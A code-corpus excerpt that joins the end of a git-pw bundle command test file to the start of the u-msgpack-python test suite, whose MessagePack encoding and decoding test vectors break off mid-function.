runner = CLIRunner()
result = runner.invoke(bundle.list_cmd, [
'--owner', 'john.doe',
'--owner', 'user.b',
'--owner', '<EMAIL>'])
assert result.exit_code == 0, result
# We should have only made a single call to '/users' (for the user
# specified by an email address) since API v1.1 supports filtering with
# usernames natively
calls = [
mock.call('users', [('q', '<EMAIL>')]),
mock.call('bundles', [
('owner', 'john.doe'), ('owner', 'user.b'), ('owner', 1),
('q', None), ('page', None), ('per_page', None),
('order', 'name')])]
mock_index.assert_has_calls(calls)
# We shouldn't see a warning about multiple versions either
assert not mock_log.warning.called
@mock.patch('git_pw.api.version', return_value=(1, 2))
@mock.patch('git_pw.api.create')
@mock.patch('git_pw.utils.echo_via_pager')
class CreateTestCase(unittest.TestCase):
@staticmethod
def _get_bundle(**kwargs):
return ShowTestCase._get_bundle(**kwargs)
def test_create(self, mock_echo, mock_create, mock_version):
"""Validate standard behavior."""
mock_create.return_value = self._get_bundle()
runner = CLIRunner()
result = runner.invoke(bundle.create_cmd, ['hello', '1', '2'])
assert result.exit_code == 0, result
mock_create.assert_called_once_with(
'bundles',
[('name', 'hello'), ('patches', (1, 2)), ('public', False)]
)
def test_create_with_public(self, mock_echo, mock_create, mock_version):
"""Validate behavior with --public option."""
mock_create.return_value = self._get_bundle()
runner = CLIRunner()
result = runner.invoke(bundle.create_cmd, [
'hello', '1', '2', '--public'])
assert result.exit_code == 0, result
mock_create.assert_called_once_with(
'bundles',
[('name', 'hello'), ('patches', (1, 2)), ('public', True)]
)
@mock.patch('git_pw.api.LOG')
def test_create_api_v1_1(
self, mock_log, mock_echo, mock_create, mock_version
):
mock_version.return_value = (1, 1)
runner = CLIRunner()
result = runner.invoke(bundle.create_cmd, ['hello', '1', '2'])
assert result.exit_code == 1, result
assert mock_log.error.called
@mock.patch('git_pw.api.version', return_value=(1, 2))
@mock.patch('git_pw.api.update')
@mock.patch('git_pw.api.detail')
@mock.patch('git_pw.utils.echo_via_pager')
class UpdateTestCase(unittest.TestCase):
@staticmethod
def _get_bundle(**kwargs):
return ShowTestCase._get_bundle(**kwargs)
def test_update(self, mock_echo, mock_detail, mock_update, mock_version):
"""Validate standard behavior."""
mock_update.return_value = self._get_bundle()
runner = CLIRunner()
result = runner.invoke(
bundle.update_cmd,
['1', '--name', 'hello', '--patch', '1', '--patch', '2'],
)
assert result.exit_code == 0, result
mock_detail.assert_not_called()
mock_update.assert_called_once_with(
'bundles', '1', [('name', 'hello'), ('patches', (1, 2))]
)
def test_update_with_public(
self, mock_echo, mock_detail, mock_update, mock_version,
):
"""Validate behavior with --public option."""
mock_update.return_value = self._get_bundle()
runner = CLIRunner()
result = runner.invoke(bundle.update_cmd, ['1', '--public'])
assert result.exit_code == 0, result
mock_detail.assert_not_called()
mock_update.assert_called_once_with('bundles', '1', [('public', True)])
@mock.patch('git_pw.api.LOG')
def test_update_api_v1_1(
self, mock_log, mock_echo, mock_detail, mock_update, mock_version,
):
mock_version.return_value = (1, 1)
runner = CLIRunner()
result = runner.invoke(bundle.update_cmd, ['1', '--name', 'hello'])
assert result.exit_code == 1, result
assert mock_log.error.called
@mock.patch('git_pw.api.version', return_value=(1, 2))
@mock.patch('git_pw.api.delete')
@mock.patch('git_pw.utils.echo_via_pager')
class DeleteTestCase(unittest.TestCase):
def test_delete(self, mock_echo, mock_delete, mock_version):
"""Validate standard behavior."""
mock_delete.return_value = None
runner = CLIRunner()
result = runner.invoke(bundle.delete_cmd, ['hello'])
assert result.exit_code == 0, result
mock_delete.assert_called_once_with('bundles', 'hello')
@mock.patch('git_pw.api.LOG')
def test_delete_api_v1_1(
self, mock_log, mock_echo, mock_delete, mock_version,
):
"""Validate standard behavior."""
mock_version.return_value = (1, 1)
runner = CLIRunner()
result = runner.invoke(bundle.delete_cmd, ['hello'])
assert result.exit_code == 1, result
assert mock_log.error.called
@mock.patch('git_pw.api.version', return_value=(1, 2))
@mock.patch('git_pw.api.update')
@mock.patch('git_pw.api.detail')
@mock.patch('git_pw.utils.echo_via_pager')
class AddTestCase(unittest.TestCase):
@staticmethod
def _get_bundle(**kwargs):
return ShowTestCase._get_bundle(**kwargs)
def test_add(
self, mock_echo, mock_detail, mock_update, mock_version,
):
"""Validate standard behavior."""
mock_detail.return_value = self._get_bundle()
mock_update.return_value = self._get_bundle()
runner = CLIRunner()
result = runner.invoke(bundle.add_cmd, ['1', '1', '2'])
assert result.exit_code == 0, result
mock_detail.assert_called_once_with('bundles', '1')
mock_update.assert_called_once_with(
'bundles', '1', [('patches', (1, 2, 42))],
)
@mock.patch('git_pw.api.LOG')
def test_add_api_v1_1(
self, mock_log, mock_echo, mock_detail, mock_update, mock_version,
):
"""Validate behavior with API v1.1."""
mock_version.return_value = (1, 1)
runner = CLIRunner()
result = runner.invoke(bundle.add_cmd, ['1', '1', '2'])
assert result.exit_code == 1, result
assert mock_log.error.called
@mock.patch('git_pw.api.version', return_value=(1, 2))
@mock.patch('git_pw.api.update')
@mock.patch('git_pw.api.detail')
@mock.patch('git_pw.utils.echo_via_pager')
class RemoveTestCase(unittest.TestCase):
@staticmethod
def _get_bundle(**kwargs):
return ShowTestCase._get_bundle(**kwargs)
def test_remove(
self, mock_echo, mock_detail, mock_update, mock_version,
):
"""Validate standard behavior."""
mock_detail.return_value = self._get_bundle(
patches=[{'id': 1}, {'id': 2}, {'id': 3}],
)
mock_update.return_value = self._get_bundle()
runner = CLIRunner()
result = runner.invoke(bundle.remove_cmd, ['1', '1', '2'])
assert result.exit_code == 0, result
mock_detail.assert_called_once_with('bundles', '1')
mock_update.assert_called_once_with(
'bundles', '1', [('patches', (3,))],
)
@mock.patch('git_pw.bundle.LOG')
def test_remove_empty(
self, mock_log, mock_echo, mock_detail, mock_update, mock_version,
):
"""Validate behavior when deleting would remove all patches."""
mock_detail.return_value = self._get_bundle(
patches=[{'id': 1}, {'id': 2}, {'id': 3}],
)
mock_update.return_value = self._get_bundle()
runner = CLIRunner()
result = runner.invoke(bundle.remove_cmd, ['1', '1', '2', '3'])
assert result.exit_code == 1, result.output
assert mock_log.error.called
mock_detail.assert_called_once_with('bundles', '1')
mock_update.assert_not_called()
@mock.patch('git_pw.api.LOG')
def test_remove_api_v1_1(
self, mock_log, mock_echo, mock_detail, mock_update, mock_version,
):
"""Validate behavior with API v1.1."""
mock_version.return_value = (1, 1)
runner = CLIRunner()
result = runner.invoke(bundle.remove_cmd, ['1', '1', '2'])
assert result.exit_code == 1, result
assert mock_log.error.called
``` |
{
"source": "00-matt/u-msgpack-python",
"score": 2
} |
#### File: 00-matt/u-msgpack-python/test_umsgpack.py
```python
import sys
import struct
import unittest
import datetime
import io
from collections import OrderedDict, namedtuple
import umsgpack
single_test_vectors = [
# None
["nil", None, b"\xc0"],
# Booleans
["bool false", False, b"\xc2"],
["bool true", True, b"\xc3"],
# + 7-bit uint
["7-bit uint", 0x00, b"\x00"],
["7-bit uint", 0x10, b"\x10"],
["7-bit uint", 0x7f, b"\x7f"],
# - 5-bit int
["5-bit sint", -1, b"\xff"],
["5-bit sint", -16, b"\xf0"],
["5-bit sint", -32, b"\xe0"],
# 8-bit uint
["8-bit uint", 0x80, b"\xcc\x80"],
["8-bit uint", 0xf0, b"\xcc\xf0"],
["8-bit uint", 0xff, b"\xcc\xff"],
# 16-bit uint
["16-bit uint", 0x100, b"\xcd\x01\x00"],
["16-bit uint", 0x2000, b"\xcd\x20\x00"],
["16-bit uint", 0xffff, b"\xcd\xff\xff"],
# 32-bit uint
["32-bit uint", 0x10000, b"\xce\x00\x01\x00\x00"],
["32-bit uint", 0x200000, b"\xce\x00\x20\x00\x00"],
["32-bit uint", 0xffffffff, b"\xce\xff\xff\xff\xff"],
# 64-bit uint
["64-bit uint", 0x100000000, b"\xcf\x00\x00\x00\x01\x00\x00\x00\x00"],
["64-bit uint", 0x200000000000, b"\xcf\x00\x00\x20\x00\x00\x00\x00\x00"],
["64-bit uint", 0xffffffffffffffff, b"\xcf\xff\xff\xff\xff\xff\xff\xff\xff"],
# 8-bit int
["8-bit int", -33, b"\xd0\xdf"],
["8-bit int", -100, b"\xd0\x9c"],
["8-bit int", -128, b"\xd0\x80"],
# 16-bit int
["16-bit int", -129, b"\xd1\xff\x7f"],
["16-bit int", -2000, b"\xd1\xf8\x30"],
["16-bit int", -32768, b"\xd1\x80\x00"],
# 32-bit int
["32-bit int", -32769, b"\xd2\xff\xff\x7f\xff"],
["32-bit int", -1000000000, b"\xd2\xc4\x65\x36\x00"],
["32-bit int", -2147483648, b"\xd2\x80\x00\x00\x00"],
# 64-bit int
["64-bit int", -2147483649, b"\xd3\xff\xff\xff\xff\x7f\xff\xff\xff"],
["64-bit int", -1000000000000000002, b"\xd3\xf2\x1f\x49\x4c\x58\x9b\xff\xfe"],
["64-bit int", -9223372036854775808, b"\xd3\x80\x00\x00\x00\x00\x00\x00\x00"],
# 64-bit float
["64-bit float", 0.0, b"\xcb\x00\x00\x00\x00\x00\x00\x00\x00"],
["64-bit float", 2.5, b"\xcb\x40\x04\x00\x00\x00\x00\x00\x00"],
["64-bit float", float(10**35), b"\xcb\x47\x33\x42\x61\x72\xc7\x4d\x82"],
# Fixstr String
["fix string", u"", b"\xa0"],
["fix string", u"a", b"\xa1\x61"],
["fix string", u"abc", b"\xa3\x61\x62\x63"],
["fix string", u"a" * 31, b"\xbf" + b"\x61" * 31],
# 8-bit String
["8-bit string", u"b" * 32, b"\xd9\x20" + b"b" * 32],
["8-bit string", u"c" * 100, b"\xd9\x64" + b"c" * 100],
["8-bit string", u"d" * 255, b"\xd9\xff" + b"d" * 255],
# 16-bit String
["16-bit string", u"b" * 256, b"\xda\x01\x00" + b"b" * 256],
["16-bit string", u"c" * 65535, b"\xda\xff\xff" + b"c" * 65535],
# 32-bit String
["32-bit string", u"b" * 65536, b"\xdb\x00\x01\x00\x00" + b"b" * 65536],
# Wide character String
["wide char string", u"Allagbé", b"\xa8Allagb\xc3\xa9"],
["wide char string", u"По оживлённым берегам",
b"\xd9\x28\xd0\x9f\xd0\xbe\x20\xd0\xbe\xd0\xb6\xd0\xb8\xd0\xb2\xd0\xbb\xd1\x91\xd0\xbd\xd0\xbd\xd1\x8b\xd0\xbc\x20\xd0\xb1\xd0\xb5\xd1\x80\xd0\xb5\xd0\xb3\xd0\xb0\xd0\xbc"],
# 8-bit Binary
["8-bit binary", b"\x80" * 1, b"\xc4\x01" + b"\x80" * 1],
["8-bit binary", b"\x80" * 32, b"\xc4\x20" + b"\x80" * 32],
["8-bit binary", b"\x80" * 255, b"\xc4\xff" + b"\x80" * 255],
# 16-bit Binary
["16-bit binary", b"\x80" * 256, b"\xc5\x01\x00" + b"\x80" * 256],
# 32-bit Binary
["32-bit binary", b"\x80" * 65536, b"\xc6\x00\x01\x00\x00" + b"\x80" * 65536],
# Fixext 1
["fixext 1", umsgpack.Ext(0x05, b"\x80" * 1), b"\xd4\x05" + b"\x80" * 1],
# Fixext 2
["fixext 2", umsgpack.Ext(0x05, b"\x80" * 2), b"\xd5\x05" + b"\x80" * 2],
# Fixext 4
["fixext 4", umsgpack.Ext(0x05, b"\x80" * 4), b"\xd6\x05" + b"\x80" * 4],
# Fixext 8
["fixext 8", umsgpack.Ext(0x05, b"\x80" * 8), b"\xd7\x05" + b"\x80" * 8],
# Fixext 16
["fixext 16", umsgpack.Ext(0x05, b"\x80" * 16),
b"\xd8\x05" + b"\x80" * 16],
# 8-bit Ext
["8-bit ext", umsgpack.Ext(0x05, b"\x80" * 255),
b"\xc7\xff\x05" + b"\x80" * 255],
# 16-bit Ext
["16-bit ext", umsgpack.Ext(0x05, b"\x80" * 256),
b"\xc8\x01\x00\x05" + b"\x80" * 256],
# 32-bit Ext
["32-bit ext", umsgpack.Ext(0x05, b"\x80" * 65536),
b"\xc9\x00\x01\x00\x00\x05" + b"\x80" * 65536],
# Empty Array
["empty array", [], b"\x90"],
# Empty Map
["empty map", {}, b"\x80"],
# 32-bit Timestamp
["32-bit timestamp", datetime.datetime(1970, 1, 1, 0, 0, 0, 0, umsgpack._utc_tzinfo),
b"\xd6\xff\x00\x00\x00\x00"],
["32-bit timestamp", datetime.datetime(2000, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo),
b"\xd6\xff\x38\x6d\xd1\x4e"],
# 64-bit Timestamp
["64-bit timestamp", datetime.datetime(2000, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo),
b"\xd7\xff\x00\x4b\x51\x40\x38\x6d\xd1\x4e"],
["64-bit timestamp", datetime.datetime(2200, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo),
b"\xd7\xff\x00\x00\x00\x01\xb0\x9e\xa6\xce"],
["64-bit timestamp", datetime.datetime(2200, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo),
b"\xd7\xff\x00\x4b\x51\x41\xb0\x9e\xa6\xce"],
# 96-bit Timestamp
["96-bit timestamp", datetime.datetime(1900, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo),
b"\xc7\x0c\xff\x00\x00\x00\x00\xff\xff\xff\xff\x7c\x56\x0f\x4e"],
["96-bit timestamp", datetime.datetime(1900, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo),
b"\xc7\x0c\xff\x00\x12\xd4\x50\xff\xff\xff\xff\x7c\x56\x0f\x4e"],
["96-bit timestamp", datetime.datetime(3000, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo),
b"\xc7\x0c\xff\x00\x00\x00\x00\x00\x00\x00\x07\x91\x5f\x59\xce"],
["96-bit timestamp", datetime.datetime(3000, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo),
b"\xc7\x0c\xff\x00\x12\xd4\x50\x00\x00\x00\x07\x91\x5f\x59\xce"],
]
composite_test_vectors = [
# Fix Array
["fix array", [5, u"abc", True],
b"\x93\x05\xa3\x61\x62\x63\xc3"],
# 16-bit Array
["16-bit array", [0x05] * 16,
b"\xdc\x00\x10" + b"\x05" * 16],
["16-bit array", [0x05] * 65535,
b"\xdc\xff\xff" + b"\x05" * 65535],
# 32-bit Array
["32-bit array", [0x05] * 65536,
b"\xdd\x00\x01\x00\x00" + b"\x05" * 65536],
# Fix Map
["fix map", OrderedDict([(1, True), (2, u"abc"), (3, b"\x80")]),
b"\x83\x01\xc3\x02\xa3\x61\x62\x63\x03\xc4\x01\x80"],
["fix map", {u"abc": 5},
b"\x81\xa3\x61\x62\x63\x05"],
["fix map", {b"\x80": 0xffff},
b"\x81\xc4\x01\x80\xcd\xff\xff"],
["fix map", {True: None},
b"\x81\xc3\xc0"],
# 16-bit Map
["16-bit map", OrderedDict([(k, 0x05) for k in range(16)]),
b"\xde\x00\x10" + b"".join([struct.pack("B", i) + b"\x05" for i in range(16)])],
["16-bit map", OrderedDict([(k, 0x05) for k in range(6000)]),
b"\xde\x17\x70" + b"".join([struct.pack("B", i) + b"\x05" for i in range(128)]) +
b"".join([b"\xcc" + struct.pack("B", i) + b"\x05" for i in range(128, 256)]) +
b"".join([b"\xcd" + struct.pack(">H", i) + b"\x05" for i in range(256, 6000)])],
# Complex Array
["complex array", [True, 0x01, umsgpack.Ext(0x03, b"foo"), 0xff,
OrderedDict([(1, False), (2, u"abc")]), b"\x80",
[1, 2, 3], u"abc"],
b"\x98\xc3\x01\xc7\x03\x03\x66\x6f\x6f\xcc\xff\x82\x01\xc2\x02\xa3\x61\x62\x63\xc4\x01\x80\x93\x01\x02\x03\xa3\x61\x62\x63"],
# Complex Map
["complex map", OrderedDict([(1, [OrderedDict([(1, 2), (3, 4)]), {}]),
(2, 1), (3, [False, u"def"]),
(4, OrderedDict([(0x100000000, u"a"),
(0xffffffff, u"b")]))]),
b"\x84\x01\x92\x82\x01\x02\x03\x04\x80\x02\x01\x03\x92\xc2\xa3\x64\x65\x66\x04\x82\xcf\x00\x00\x00\x01\x00\x00\x00\x00\xa1\x61\xce\xff\xff\xff\xff\xa1\x62"],
# Map with Tuple Keys
["map with tuple keys", OrderedDict([((u"foo", False, 3), True),
((3e6, -5), u"def")]),
b"\x82\x93\xa3\x66\x6f\x6f\xc2\x03\xc3\x92\xcb\x41\x46\xe3\x60\x00\x00\x00\x00\xfb\xa3\x64\x65\x66"],
# Map with Complex Tuple Keys
["map with complex tuple keys", {(u"foo", (1, 2, 3), 3): -5},
b"\x81\x93\xa3\x66\x6f\x6f\x93\x01\x02\x03\x03\xfb"]
]
pack_exception_test_vectors = [
# Unsupported type exception
["unsupported type", set([1, 2, 3]), umsgpack.UnsupportedTypeException],
["unsupported type", -2**(64 - 1) - 1, umsgpack.UnsupportedTypeException],
["unsupported type", 2**64, umsgpack.UnsupportedTypeException],
]
unpack_exception_test_vectors = [
# Type errors
["type error unpack unicode string", u"\x01", TypeError],
["type error unpack boolean", True, TypeError],
# Insufficient data to unpack object
["insufficient data 8-bit uint", b"\xcc",
umsgpack.InsufficientDataException],
["insufficient data 16-bit uint", b"\xcd\xff",
umsgpack.InsufficientDataException],
["insufficient data 32-bit uint", b"\xce\xff",
umsgpack.InsufficientDataException],
["insufficient data 64-bit uint", b"\xcf\xff",
umsgpack.InsufficientDataException],
["insufficient data 8-bit int", b"\xd0",
umsgpack.InsufficientDataException],
["insufficient data 16-bit int", b"\xd1\xff",
umsgpack.InsufficientDataException],
["insufficient data 32-bit int", b"\xd2\xff",
umsgpack.InsufficientDataException],
["insufficient data 64-bit int", b"\xd3\xff",
umsgpack.InsufficientDataException],
["insufficient data 32-bit float", b"\xca\xff",
umsgpack.InsufficientDataException],
["insufficient data 64-bit float", b"\xcb\xff",
umsgpack.InsufficientDataException],
["insufficient data fixstr", b"\xa1",
umsgpack.InsufficientDataException],
["insufficient data 8-bit string", b"\xd9",
umsgpack.InsufficientDataException],
["insufficient data 8-bit string", b"\xd9\x01",
umsgpack.InsufficientDataException],
["insufficient data 16-bit string", b"\xda\x01\x00",
umsgpack.InsufficientDataException],
["insufficient data 32-bit string", b"\xdb\x00\x01\x00\x00",
umsgpack.InsufficientDataException],
["insufficient data 8-bit binary", b"\xc4",
umsgpack.InsufficientDataException],
["insufficient data 8-bit binary", b"\xc4\x01",
umsgpack.InsufficientDataException],
["insufficient data 16-bit binary", b"\xc5\x01\x00",
umsgpack.InsufficientDataException],
["insufficient data 32-bit binary", b"\xc6\x00\x01\x00\x00",
umsgpack.InsufficientDataException],
["insufficient data fixarray", b"\x91",
umsgpack.InsufficientDataException],
["insufficient data fixarray", b"\x92\xc2",
umsgpack.InsufficientDataException],
["insufficient data 16-bit array", b"\xdc\x00\xf0\xc2\xc3",
umsgpack.InsufficientDataException],
["insufficient data 32-bit array", b"\xdd\x00\x01\x00\x00\xc2\xc3",
umsgpack.InsufficientDataException],
["insufficient data fixmap", b"\x81",
umsgpack.InsufficientDataException],
["insufficient data fixmap", b"\x82\xc2\xc3",
umsgpack.InsufficientDataException],
["insufficient data 16-bit map", b"\xde\x00\xf0\xc2\xc3",
umsgpack.InsufficientDataException],
["insufficient data 32-bit map", b"\xdf\x00\x01\x00\x00\xc2\xc3",
umsgpack.InsufficientDataException],
["insufficient data fixext 1", b"\xd4",
umsgpack.InsufficientDataException],
["insufficient data fixext 1", b"\xd4\x05",
umsgpack.InsufficientDataException],
["insufficient data fixext 2", b"\xd5\x05\x01",
umsgpack.InsufficientDataException],
["insufficient data fixext 4", b"\xd6\x05\x01\x02\x03",
umsgpack.InsufficientDataException],
["insufficient data fixext 8", b"\xd7\x05\x01\x02\x03",
umsgpack.InsufficientDataException],
["insufficient data fixext 16", b"\xd8\x05\x01\x02\x03",
umsgpack.InsufficientDataException],
["insufficient data ext 8-bit", b"\xc7\x05\x05\x01\x02\x03",
umsgpack.InsufficientDataException],
["insufficient data ext 16-bit", b"\xc8\x01\x00\x05\x01\x02\x03",
umsgpack.InsufficientDataException],
["insufficient data ext 32-bit", b"\xc9\x00\x01\x00\x00\x05\x01\x02\x03",
umsgpack.InsufficientDataException],
# Unhashable key { 1 : True, { 1 : 1 } : False }
["unhashable key", b"\<KEY>",
umsgpack.UnhashableKeyException],
# Unhashable key { [ 1, 2, {} ] : True }
["unhashable key", b"\<KEY>",
umsgpack.UnhashableKeyException],
# Key duplicate { 1 : True, 1 : False }
["duplicate key", b"\<KEY>",
umsgpack.DuplicateKeyException],
# Reserved code (0xc1)
["reserved code", b"\xc1",
umsgpack.ReservedCodeException],
# Unsupported timestamp (unsupported data length)
["unsupported timestamp", b"\xc7\x02\xff\xaa\xbb",
umsgpack.UnsupportedTimestampException],
# Invalid string (non utf-8)
["invalid string", b"\xa1\x80",
umsgpack.InvalidStringException],
]
compatibility_test_vectors = [
# Fix Raw
["fix raw", b"", b"\xa0"],
["fix raw", u"", b"\xa0"],
["fix raw", b"a", b"\xa1\x61"],
["fix raw", u"a", b"\xa1\x61"],
["fix raw", b"abc", b"\xa3\x61\x62\x63"],
["fix raw", u"abc", b"\xa3\x61\x62\x63"],
["fix raw", b"a" * 31, b"\xbf" + b"\x61" * 31],
["fix raw", u"a" * 31, b"\xbf" + b"\x61" * 31],
# 16-bit Raw
["16-bit raw", u"b" * 32, b"\xda\x00\x20" + b"b" * 32],
["16-bit raw", b"b" * 32, b"\xda\x00\x20" + b"b" * 32],
["16-bit raw", u"b" * 256, b"\xda\x01\x00" + b"b" * 256],
["16-bit raw", b"b" * 256, b"\xda\x01\x00" + b"b" * 256],
["16-bit raw", u"c" * 65535, b"\xda\xff\xff" + b"c" * 65535],
["16-bit raw", b"c" * 65535, b"\xda\xff\xff" + b"c" * 65535],
# 32-bit Raw
["32-bit raw", u"b" * 65536, b"\xdb\x00\x01\x00\x00" + b"b" * 65536],
["32-bit raw", b"b" * 65536, b"\xdb\x00\x01\x00\x00" + b"b" * 65536],
]
float_precision_test_vectors = [
["float precision single", 2.5, b"\xca\x40\x20\x00\x00"],
["float precision double", 2.5, b"\xcb\x40\x04\x00\x00\x00\x00\x00\x00"],
]
tuple_test_vectors = [
["nested array", [0x01, [b"\x80", [[u"a", u"b", u"c"], True]]],
b"\x92\x01\x92\xc4\x01\x80\x92\x93\xa1a\xa1b\xa1c\xc3",
(0x01, (b"\x80", ((u"a", u"b", u"c"), True)))],
]
naive_timestamp_test_vectors = [
["32-bit timestamp (naive)", datetime.datetime(2000, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo),
b"\xd6\xff\x38\x6d\xd1\x4e",
datetime.datetime(2000, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo)],
["64-bit timestamp (naive)", datetime.datetime(2200, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo),
b"\xd7\xff\x00\x4b\x51\x41\xb0\x9e\xa6\xce",
datetime.datetime(2200, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo)],
["96-bit timestamp (naive)", datetime.datetime(3000, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo),
b"\xc7\x0c\xff\x00\x12\xd4\x50\x00\x00\x00\x07\x91\x5f\x59\xce",
datetime.datetime(3000, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo)],
]
CustomType = namedtuple('CustomType', ['x', 'y', 'z'])
ext_handlers = {
complex: lambda obj: umsgpack.Ext(0x20, struct.pack("<ff", obj.real, obj.imag)),
CustomType: lambda obj: umsgpack.Ext(0x30, umsgpack.packb(list(obj))),
0x20: lambda ext: complex(*struct.unpack("<ff", ext.data)),
0x30: lambda ext: CustomType(*umsgpack.unpackb(ext.data)),
}
ext_handlers_test_vectors = [
["complex", complex(1, 2), b"\xd7\x20\x00\x00\x80\x3f\x00\x00\x00\x40"],
["custom type", CustomType(b"abc", 123, True),
b"\xd7\x30\x93\xc4\x03\x61\x62\x63\x7b\xc3"],
]
override_ext_handlers = {
datetime.datetime:
lambda obj: umsgpack.Ext(0x40, obj.strftime("%Y%m%dT%H:%M:%S.%f").encode()),
-0x01:
lambda ext: ext,
}
override_ext_handlers_test_vectors = [
["pack override",
datetime.datetime(2000, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo),
b'\xc7\x18@20000101T10:05:02.000000'],
["unpack override",
umsgpack.Ext(-0x01, b"\x00\xbb\xcc\xdd\x01\x02\x03\x04\x05\x06\x07\x08"),
b'\xc7\x0c\xff\x00\xbb\xcc\xdd\x01\x02\x03\x04\x05\x06\x07\x08'],
]
# These are the only global variables that should be exported by umsgpack
exported_vars_test_vector = [
"Ext",
"InvalidString",
"PackException",
"UnpackException",
"UnsupportedTypeException",
"InsufficientDataException",
"InvalidStringException",
"UnsupportedTimestampException",
"ReservedCodeException",
"UnhashableKeyException",
"DuplicateKeyException",
"KeyNotPrimitiveException",
"KeyDuplicateException",
"ext_serializable",
"pack",
"packb",
"unpack",
"unpackb",
"dump",
"dumps",
"load",
"loads",
"version",
"compatibility",
]
##########################################################################
class TestUmsgpack(unittest.TestCase):
def test_pack_single(self):
for (name, obj, data) in single_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
self.assertEqual(umsgpack.packb(obj), data)
def test_pack_composite(self):
for (name, obj, data) in composite_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
self.assertEqual(umsgpack.packb(obj), data)
def test_pack_exceptions(self):
for (name, obj, exception) in pack_exception_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
with self.assertRaises(exception):
umsgpack.packb(obj)
def test_unpack_single(self):
for (name, obj, data) in single_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
unpacked = umsgpack.unpackb(data)
# In Python2, we have both int and long integer types, but which
# one we end up with depends on the architecture (32-bit/64-bit)
if sys.version_info[0] == 2:
# Allow both {int,long} -> unpackb -> {int,long}
if isinstance(obj, int) or isinstance(obj, long):
self.assertTrue(isinstance(unpacked, int) or
isinstance(unpacked, long))
else:
self.assertTrue(isinstance(unpacked, type(obj)))
# In Python3, we only have the int integer type
else:
self.assertTrue(isinstance(unpacked, type(obj)))
self.assertEqual(unpacked, obj)
def test_unpack_composite(self):
for (name, obj, data) in composite_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
self.assertEqual(umsgpack.unpackb(data), obj)
def test_unpack_exceptions(self):
for (name, data, exception) in unpack_exception_test_vectors:
print("\tTesting {:s}".format(name))
with self.assertRaises(exception):
umsgpack.unpackb(data)
def test_pack_compatibility(self):
umsgpack.compatibility = True
for (name, obj, data) in compatibility_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
self.assertEqual(umsgpack.packb(obj), data)
umsgpack.compatibility = False
def test_unpack_compatibility(self):
umsgpack.compatibility = True
for (name, obj, data) in compatibility_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
unpacked = umsgpack.unpackb(data)
# Encoded raw should always unpack to bytes in compatibility mode,
# so convert any string obj to bytes before comparison
if sys.version_info[0] == 3 and isinstance(obj, str):
_obj = obj.encode('utf-8')
elif sys.version_info[0] == 2 and isinstance(obj, unicode):
_obj = bytes(obj)
else:
_obj = obj
self.assertTrue(isinstance(unpacked, type(_obj)))
self.assertEqual(unpacked, _obj)
umsgpack.compatibility = False
def test_unpack_invalid_string(self):
# Use last unpack exception test vector (an invalid string)
(_, data, _) = unpack_exception_test_vectors[-1]
obj = umsgpack.unpackb(data, allow_invalid_utf8=True)
self.assertTrue(isinstance(obj, umsgpack.InvalidString))
self.assertEqual(obj, b"\x80")
def test_unpack_ordered_dict(self):
# Use last composite test vector (a map)
(_, obj, data) = composite_test_vectors[-1]
# Unpack with default options (unordered dict)
unpacked = umsgpack.unpackb(data)
self.assertTrue(isinstance(unpacked, dict))
# Unpack with unordered dict
unpacked = umsgpack.unpackb(data, use_ordered_dict=False)
self.assertTrue(isinstance(unpacked, dict))
# Unpack with ordered dict
unpacked = umsgpack.unpackb(data, use_ordered_dict=True)
self.assertTrue(isinstance(unpacked, OrderedDict))
self.assertEqual(unpacked, obj)
def test_unpack_tuple(self):
# Use tuple test vector
(_, obj, data, obj_tuple) = tuple_test_vectors[0]
# Unpack with default options (list)
self.assertEqual(umsgpack.unpackb(data), obj)
# Unpack with use_tuple=False (list)
self.assertEqual(umsgpack.unpackb(data, use_tuple=False), obj)
# Unpack with use_tuple=True (tuple)
self.assertEqual(umsgpack.unpackb(data, use_tuple=True), obj_tuple)
def test_ext_exceptions(self):
# Test invalid Ext type type
with self.assertRaises(TypeError):
_ = umsgpack.Ext(5.0, b"")
# Test invalid data type
with self.assertRaises(TypeError):
_ = umsgpack.Ext(0, u"unicode string")
# Test out of range Ext type value
with self.assertRaises(ValueError):
_ = umsgpack.Ext(-129, b"data")
with self.assertRaises(ValueError):
_ = umsgpack.Ext(128, b"data")
def test_pack_ext_handler(self):
for (name, obj, data) in ext_handlers_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
packed = umsgpack.packb(obj, ext_handlers=ext_handlers)
self.assertEqual(packed, data)
def test_unpack_ext_handler(self):
for (name, obj, data) in ext_handlers_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
